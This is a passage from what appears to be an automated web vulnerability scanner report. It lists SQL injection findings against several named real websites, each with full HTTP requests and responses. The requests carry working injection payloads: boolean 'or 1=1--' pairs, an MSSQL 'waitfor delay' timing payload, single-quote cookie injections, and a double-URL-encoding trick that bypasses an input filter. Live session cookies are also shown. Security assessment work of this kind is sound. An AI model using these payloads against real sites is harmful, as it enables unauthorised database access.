Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902%2527; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.glam.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 14:20:26 GMT
Content-Type: text/html; charset=UTF-8
Expires: Mon, 02 May 2011 14:20:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 14:20:26 GMT
Content-Length: 27727
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<body class="error404" id="bodyID">
...[SNIP]...

Request 2

GET /register HTTP/1.1
Host: www.glam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902%2527%2527; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;

Response 2

HTTP/1.1 502 Bad Gateway
Content-Type: text/html
Expires: Mon, 02 May 2011 14:21:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 14:21:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107

<html><body><h1>502 Bad Gateway</h1>
The server returned an invalid or incomplete response.
</body></html>

1.31. http://www.glam.com/topic/feed/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.glam.com
Path:   /topic/feed/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /topic%2527/feed/ HTTP/1.1
Host: www.glam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 419
X-Varnish: 1026560449
Expires: Mon, 02 May 2011 14:28:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 14:28:25 GMT
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailabl
...[SNIP]...
<h1>Error 503 Service Unavailable</h1>
...[SNIP]...

Request 2

GET /topic%2527%2527/feed/ HTTP/1.1
Host: www.glam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.glam.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 14:28:31 GMT
ETag: "125a6da3d287aa017e47cee5719e8da6"
Content-Type: text/xml; charset=UTF-8
backend-server: app135
X-Varnish: 1026561083
Expires: Mon, 02 May 2011 14:28:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 14:28:31 GMT
Content-Length: 942
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:dc="http://purl.org/dc/elem
...[SNIP]...

1.32. http://www.glam.com/topic/feed/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.glam.com
Path:   /topic/feed/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter. The application took 63192 milliseconds to respond to the request, compared with 172 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /topic/feed/?1',0)waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
Host: www.glam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.glam.com/xmlrpc.php
Last-Modified: Sat, 30 Apr 2011 19:22:01 GMT
ETag: "125a6da3d287aa017e47cee5719e8da6"
Content-Type: text/xml; charset=UTF-8
backend-server: app135
X-Varnish: 1026556522 1026546019
X-Cache-Hits: 1
Expires: Mon, 02 May 2011 14:21:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 14:21:55 GMT
Content-Length: 742
Connection: close

<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:atom="http://www.w3.org/2005/Atom
...[SNIP]...

1.33. http://www.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.glam.com
Path:   /wp-content/plugins/menus-plus/javascriptmenu.php

Issue detail

The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 13880390%20or%201%3d1--%20 and 13880390%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=113880390%20or%201%3d1--%20 HTTP/1.1
Host: www.glam.com
Proxy-Connection: keep-alive
Referer: http://www.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmb=234602824; __utmc=234602824

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Mon, 02 May 2011 06:05:54 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
X-Varnish: 1026475851
Expires: Mon, 02 May 2011 13:05:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 13:05:56 GMT
Connection: close
Content-Length: 20591

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'><li class='cufonClass'><a href='http://www.glam.com' title='' style='color:white' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://www.glam.com' title='' style='color:white' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://fashion.glam.com/' title='Fashion' onmouseover='showSubMenu(4)' onmouseout='hideSubMenu();'>Fashion</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://trends.glam.com/' title='Trends' onmouseover='showSubMenu(5)' onmouseout='hideSubMenu();'>Trends</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://runway.glam.com/' title='Runway' onmouseover='showSubMenu(6)' onmouseout='hideSubMenu();'>Runway</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://designers.glam.com/' title='Designers' onmouseover='showSubMenu(7)' onmouseout='hideSubMenu();'>Designers</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://shopping.glam.com/' title='Shopping' onmouseover='showSubMenu(8)' onmouseout='hideSubMenu();'>Shopping</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://beauty.glam.com/' title='Beauty' onmouseover='showSubMenu(9)' onmouseout='hideSubMenu();'>Beauty</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://hair.glam.com/' title='Hair' onmouseover='showSubMenu(10)' onmouseout='hideSubMenu();'>Hair</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://makeup.glam.com/' title='Makeup' onmouseover='showSubMenu(11)' onmouseout='hideSubMenu();'>Makeup</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://skinbody.glam.com/' title='Skin &amp; B
...[SNIP]...

Request 2

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=113880390%20or%201%3d2--%20 HTTP/1.1
Host: www.glam.com
Proxy-Connection: keep-alive
Referer: http://www.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmb=234602824; __utmc=234602824

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Mon, 02 May 2011 13:05:57 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
X-Varnish: 1026475903
Expires: Mon, 02 May 2011 13:05:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 13:05:57 GMT
Connection: close
Content-Length: 1968

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'></ul></div> "; document.write(string);var string ="<div onmouseover='showme();' onmouseout='hideme();' class='SubNav'><style type='text/css'>._glam_search_button {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px 0; width: 55px; height: 20px;list-style:none} ._glam_search_twitter {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px -300px; width: 20px; height: 20px;} ._glam_search_facebook {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -495px; width: 20px; height: 20px;} ._glam_search_rss {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -1935px; width: 20px; height: 20px;}</style> <div class='SocialContainer'id='menusearch'><div class='SearchBox'><form role='search' name='searchform' method='get' id='searchform' action='http://www.glam.com' ><div class='search_controls'><input type='text' style='height:15px;' value='' name='search' id='search' /></div><div style='float:left;margin-top:3px;'><span onclick='javascript:document.searchform.submit();' style='cursor:pointer'><div class='_glam_search_button'></div></span></div></div> <ul class='social'> <a href='http://twitter.com/onglamfashion' target='_blank'><div class='_glam_search_twitter'></div></a> <a href='http://www.facebook.com/pages/Glamcom/144180538945796?ref=ts' target='_blank'><div class='_glam_search_facebook'></div></a> <a href='http://fashion.glam.com/feed/' target='_blank'><div class='_glam_search_rss'></div></a> </ul> </div> </div><div class='homehorizontalBorder'></div>";

document.write(string)

1.34. http://www.wiseshop.com/shop.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.wiseshop.com
Path:   /shop.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /shop.php?1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.wiseshop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=a211571b9df89ace6097499eec2d130de55f084c-954372b780745a3c3e66ad3e1a8a46e46c5b08f3; PHPSESSID=i2htret7k8ivj3snodk9ebjrp2; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=1-BUFDuhtpQPfhYM2mO-evYdWhAi5GyM91rg4ih_0qgvmXm6SXtJs-EB2XqLP1y0nhEKCCYDljwENG6RVEX5UEYhxlQO-o-kf_in1Ri2_CHOcsANvX5k81IbozK9Mo3KUOiuNBYlORwnG256VeqNwtKSMBYXqgLeYEENLOWsxn5Eble1QxvJLAxLQMl0S4Gxj_5PzsZhDVmcS_-m-KnKrL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVTJkl49MSOoMPGG9ots9Ha9brHBwN_RfMO_kmZGeb20z9y_IXe-ZR1Tf5It-hsDm57IMKie8yahl;

Response 1

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.wiseshop.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Mon, 02 May 2011 15:05:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 15:05:49 GMT
Content-Length: 24249
Connection: close
Set-Cookie: uvx=1-BUFDuhtpQPfhYM2mO-evYdWhAi5GyM91rg4ih_0qgvmXm6SXtJs-EB2XqLP1y0nhEKCCYDljwENG6RVEX5UEYhxlQO-o-kf_in1Ri2_CHOcsANvX5k81IbozK9Mo3KUOiuNBYlORwnG256VeqNwtKSMBYXqgLeYEENLOWsxn5Eble1QxvJLAxLQMl0S4Gxj_5PzsZhDVmcS_-m-KnKrL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVTJkl49MSOoMPGG9ots9Ha9brHBwN_RfMO_kmZGeb20z9y_IXe-ZR1Tf5It-hsDm57IMKie8yahl; expires=Sun, 02-May-2021 05:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="4777db28467cd55a311f
...[SNIP]...
<span class="post">from Springfield, IL</span></span>
       <span class="child_body">After having several Linksys routers go bad after a month or two of usage, I discovered this Netgear router. I've had it over a year, and I haven't had a problem yet. </span>
       </div></li><li><div class="node_child">        <span class="child_added_by"><span class='pre'>by </span><span class='name'>Nicole</span><span class="post">from New York, NY</span></span>
       <span class="child_body">Netgear offers the best wireless routers out there, and they're extremely reliable. Prices vary greatly depending on which kind would satisfy your needs so chose carefully.</span>
       </div></li><li><div class="node_child">        <span class="child_added_by"><span class='pre'>by </span><span class='name'>Jennifer</span><span class="post">from Beaver, WV</span></span>
       <span class="child_body">The Linksys WRT54G router is a good, low cost router for home use.</span>
       </div></li></ul></li><li><div class="node_title"></div><div class="node_head"></div><div class="node_body">Are there any companies that specialize in acoustic research? I am trying to build a home theater room and need help getting the acoustic properties of the room correct.</div><a rel="facebox" href="/solo?module=facebook/login&message_num=4" class="more_link">Reply</a><div class='author_name'><span><span class="question">Question</span></span>Shelby H.<span class='post'>from Dover, DE</span></div><ul class="node_children"><li><div class="node_child">        <span class="child_added_by"><span class='pre'>by </span><span class='name'>Kira</span><span class="post">from Pinedale, WY</span></span>
       <span class="child_body">I use these -- with a name like "acoustic research" I figure that they already did the work for me!</span>
       <div class="recommended_product">    <img src='http://img.bizrate.com/resize?sq=80&uid=1848571785'/></div><div class='recommendation'><div class='author'>Kira's recommendation:</div><div class='title'>Acoustic Research AW880 Portable Wireless Indoor Stereo Sp
...[SNIP]...

Request 2

GET /shop.php?1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.wiseshop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=a211571b9df89ace6097499eec2d130de55f084c-954372b780745a3c3e66ad3e1a8a46e46c5b08f3; PHPSESSID=i2htret7k8ivj3snodk9ebjrp2; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=1-BUFDuhtpQPfhYM2mO-evYdWhAi5GyM91rg4ih_0qgvmXm6SXtJs-EB2XqLP1y0nhEKCCYDljwENG6RVEX5UEYhxlQO-o-kf_in1Ri2_CHOcsANvX5k81IbozK9Mo3KUOiuNBYlORwnG256VeqNwtKSMBYXqgLeYEENLOWsxn5Eble1QxvJLAxLQMl0S4Gxj_5PzsZhDVmcS_-m-KnKrL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVTJkl49MSOoMPGG9ots9Ha9brHBwN_RfMO_kmZGeb20z9y_IXe-ZR1Tf5It-hsDm57IMKie8yahl;

Response 2

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.wiseshop.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Mon, 02 May 2011 15:05:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 15:05:49 GMT
Content-Length: 24237
Connection: close
Set-Cookie: uvx=1-BUFDuhtpQPfhYM2mO-evYdWhAi5GyM91rg4ih_0qgvmXm6SXtJs-EB2XqLP1y0nhEKCCYDljwENG6RVEX5UEYhxlQO-o-kf_in1Ri2_CHOcsANvX5k81IbozK9Mo3KUOiuNBYlORwnG256VeqNwtKSMBYXqgLeYEENLOWsxn5Eble1QxvJLAxLQMl0S4Gxj_5PzsZhDVmcS_-m-KnKrL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVTJkl49MSOoMPGG9ots9Ha9brHBwN_RfMO_kmZGeb20z9y_IXe-ZR1Tf5It-hsDm57IMKie8yahl; expires=Sun, 02-May-2021 05:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="4777db28467cd55a311f
...[SNIP]...
<span class="post">from Hastings, NE</span></span>
       <span class="child_body">After having several Linksys routers go bad after a month or two of usage, I discovered this Netgear router. I've had it over a year, and I haven't had a problem yet. </span>
       </div></li><li><div class="node_child">        <span class="child_added_by"><span class='pre'>by </span><span class='name'>Nicole</span><span class="post">from Logan, UT</span></span>
       <span class="child_body">Netgear offers the best wireless routers out there, and they're extremely reliable. Prices vary greatly depending on which kind would satisfy your needs so chose carefully.</span>
       </div></li><li><div class="node_child">        <span class="child_added_by"><span class='pre'>by </span><span class='name'>Jennifer</span><span class="post">from Davenport, IA</span></span>
       <span class="child_body">The Linksys WRT54G router is a good, low cost router for home use.</span>
       </div></li></ul></li><li><div class="node_title"></div><div class="node_head"></div><div class="node_body">Are there any companies that specialize in acoustic research? I am trying to build a home theater room and need help getting the acoustic properties of the room correct.</div><a rel="facebox" href="/solo?module=facebook/login&message_num=4" class="more_link">Reply</a><div class='author_name'><span><span class="question">Question</span></span>Shelby H.<span class='post'>from Dover, DE</span></div><ul class="node_children"><li><div class="node_child">        <span class="child_added_by"><span class='pre'>by </span><span class='name'>Kira</span><span class="post">from Newport, RI</span></span>
       <span class="child_body">I use these -- with a name like "acoustic research" I figure that they already did the work for me!</span>
       <div class="recommended_product">    <img src='http://img.bizrate.com/resize?sq=80&uid=1848571785'/></div><div class='recommendation'><div class='author'>Kira's recommendation:</div><div class='title'>Acoustic Research AW880 Portable Wireless Indoor Stereo Speake
...[SNIP]...

1.35. http://www2.idexpertscorp.com/blog [exp_super_search_history cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.idexpertscorp.com
Path:   /blog

Issue detail

The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /blog HTTP/1.1
Host: www2.idexpertscorp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ubvt=173.193.214.243.1304349963666894; exp_last_visit=989015581; exp_super_search_history=797022'; __switchTo5x=58; __utmz=1.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=8236212.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1304375596; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; PHPSESSID=jfnbk4r5pvilc331tug96gdad0; __unam=440469-12fb26a1110-5868adc8-3; __utma=1.843288026.1304368386.1304368386.1304368386.1; __utmc=1; __utmb=1.3.10.1304368386; __utma=8236212.1025446137.1304368386.1304368386.1304368386.1; __utmc=8236212; __utmb=8236212.3.10.1304368386

Response (redirected)

HTTP/1.1 500 Internal Server Error
Date: Mon, 02 May 2011 15:41:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1304376082; expires=Tue, 01-May-2012 15:41:22 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A1%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Cache-Control: public
Expires: Sat, 07 May 2011 15:41:22 GMT
imagetoolbar: no
Content-Length: 1026
Connection: close
Content-Type: text/html

<html>
<head>
<title>Database Error</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                #000
...[SNIP]...
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p>
...[SNIP]...

1.36. http://www2.idexpertscorp.com/blog/ [exp_super_search_history cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.idexpertscorp.com
Path:   /blog/

Issue detail

The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /blog/ HTTP/1.1
Host: www2.idexpertscorp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ubvt=173.193.214.243.1304349963666894; exp_last_visit=989015581; exp_super_search_history=797022'; __switchTo5x=58; __utmz=1.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=8236212.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1304375596; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; PHPSESSID=jfnbk4r5pvilc331tug96gdad0; __unam=440469-12fb26a1110-5868adc8-3; __utma=1.843288026.1304368386.1304368386.1304368386.1; __utmc=1; __utmb=1.3.10.1304368386; __utma=8236212.1025446137.1304368386.1304368386.1304368386.1; __utmc=8236212; __utmb=8236212.3.10.1304368386

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 02 May 2011 15:41:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1304376119; expires=Tue, 01-May-2012 15:41:59 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A1%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Cache-Control: public
Expires: Sat, 07 May 2011 15:41:59 GMT
imagetoolbar: no
Content-Length: 1026
Connection: close
Content-Type: text/html

<html>
<head>
<title>Database Error</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                #000
...[SNIP]...
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p>
...[SNIP]...

1.37. http://www2.idexpertscorp.com/blog/single/are-we-getting-any-smarter/ [exp_super_search_history cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.idexpertscorp.com
Path:   /blog/single/are-we-getting-any-smarter/

Issue detail

The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /blog/single/are-we-getting-any-smarter/ HTTP/1.1
Host: www2.idexpertscorp.com
Proxy-Connection: keep-alive
Referer: http://www2.idexpertscorp.com/blog/
